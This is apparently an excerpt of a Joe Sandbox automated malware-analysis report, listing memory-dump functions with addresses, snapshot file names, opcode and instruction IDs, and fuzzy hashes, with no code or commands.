                                                                                                                    • Snapshot File: hcaresult_34_2_7ffd9b7d0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: cef8e4a59299c9b63d0d57e396ed749fdcb38a0b869536986091692cd94c8f30
                                                                                                                    • Instruction ID: a7ccde51ffaebf982fee43da4dd1b920e211f0f70841fa5207d4da50c9dd1c1f
                                                                                                                    • Opcode Fuzzy Hash: cef8e4a59299c9b63d0d57e396ed749fdcb38a0b869536986091692cd94c8f30
                                                                                                                    • Instruction Fuzzy Hash: 0CE01234B0930ECBE710DB94C4A46ED7761EB91751F504365C405872E9DA786788C680
                                                                                                                    Function 00007FFD9B7E82FE Relevance: .0, Instructions: 15COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000022.00000002.1908027964.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_34_2_7ffd9b7e0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5fb8d9d9cda7e7fa439ae7f2e089c60b770e96dab7b1b55962544499104dd7c1
                                                                                                                    • Instruction ID: fbdd5c4b5fff347f9e6f1c977a1816f8087de09adc33b0b713bf33043c82925e
                                                                                                                    • Opcode Fuzzy Hash: 5fb8d9d9cda7e7fa439ae7f2e089c60b770e96dab7b1b55962544499104dd7c1
                                                                                                                    • Instruction Fuzzy Hash: 41E0EC30E0962ECAE7B0DB54C8947AC72A1BF08301F9503F5C00DA31B5CB796E819B41
                                                                                                                    Function 00007FFD9B7E44BD Relevance: .0, Instructions: 12COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000022.00000002.1908027964.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_34_2_7ffd9b7e0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a7cfc572cdebb4dde5388e471b9b96557620e28f591995bb88b2115411df963a
                                                                                                                    • Instruction ID: 96111e4814882116b39774a90f1dfd4572fbfc004994c8cc9b03902f48835ef8
                                                                                                                    • Opcode Fuzzy Hash: a7cfc572cdebb4dde5388e471b9b96557620e28f591995bb88b2115411df963a
                                                                                                                    • Instruction Fuzzy Hash: B2D09E74E1895ECAEB58EB94C865ABDB6B1BF84304F410175D02DA32EECF3829024741
                                                                                                                    Function 00007FFD9B7D4960 Relevance: .0, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000022.00000002.1908027964.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_34_2_7ffd9b7d0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: de2f115ada3591e00aa73595d14502d526454d2b9e7ce6b69c2b2684b7b4a166
                                                                                                                    • Instruction ID: dc36e34ba390c49d92610d305e4f9062a511a198adc23c72ddc40da4ce46ae6c
                                                                                                                    • Opcode Fuzzy Hash: de2f115ada3591e00aa73595d14502d526454d2b9e7ce6b69c2b2684b7b4a166
                                                                                                                    • Instruction Fuzzy Hash: FDC08C00F0CD2A06F75AA204243067D08025F80208F8107B0E41E877DECD0C1E0212CB

                                                                                                                    Non-executed Functions

                                                                                                                    Function 00007FFD9B7E06FA Relevance: 9.0, Strings: 7, Instructions: 222COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000022.00000002.1908027964.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_34_2_7ffd9b7e0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: =N_^$N_^%$N_^($N_^*$N_^+$N_^2$N_^4
                                                                                                                    • API String ID: 0-1975945381
                                                                                                                    • Opcode ID: ead795f3082a5b0d8de7ed053cbd4e31487b3479410fb032dc5d0ac12dcca313
                                                                                                                    • Instruction ID: 12fb3e0747269d8c57731d47c99d247bc52a000c5d81f98526bea7302f477ab5
                                                                                                                    • Opcode Fuzzy Hash: ead795f3082a5b0d8de7ed053cbd4e31487b3479410fb032dc5d0ac12dcca313
                                                                                                                    • Instruction Fuzzy Hash: 3F51855BF0C56609E319B7A8396A9FD3724DF8133EB26C6B3E12E890D78C1C658241D9
                                                                                                                    Function 00007FFD9B7E063D Relevance: 7.8, Strings: 6, Instructions: 297COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000022.00000002.1908027964.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_34_2_7ffd9b7e0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: =N_^$N_^($N_^*$N_^+$N_^2$N_^4
                                                                                                                    • API String ID: 0-837699881
                                                                                                                    • Opcode ID: b3dd306a25b4eb25e4fd16bdd6510cdd599aa49d87ec3214658853a33fbc0ca3
                                                                                                                    • Instruction ID: 894b414ecc398bf6d8e61e1a0b293f38030d7e851c5f5c77e219116f1ee95af7
                                                                                                                    • Opcode Fuzzy Hash: b3dd306a25b4eb25e4fd16bdd6510cdd599aa49d87ec3214658853a33fbc0ca3
                                                                                                                    • Instruction Fuzzy Hash: CF81061BF0C5A609D319B7ED796A9FD7720DFC037EB2686B3D26E890D78C18608242D5
                                                                                                                    Function 00007FFD9B7E06D3 Relevance: 5.2, Strings: 4, Instructions: 226COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000022.00000002.1908027964.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_34_2_7ffd9b7e0000_aXnWbWpBWYJmkhPMHrrUNM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: N_^*$N_^+$N_^2$N_^4
                                                                                                                    • API String ID: 0-2488992247
                                                                                                                    • Opcode ID: 31ad36dbd34d14c8f9b1075315c9ff444c6a23da3e1dd33c2b854abe93a877ad
                                                                                                                    • Instruction ID: a62255f11a0233fea9bca9a5306f955965a107f2f578efac510cb03b54c05d4d
                                                                                                                    • Opcode Fuzzy Hash: 31ad36dbd34d14c8f9b1075315c9ff444c6a23da3e1dd33c2b854abe93a877ad
                                                                                                                    • Instruction Fuzzy Hash: B651851BF0C5A605E719B7B8396A8FD7720DF8133EB26C6F7E16E890DB8C18658241C5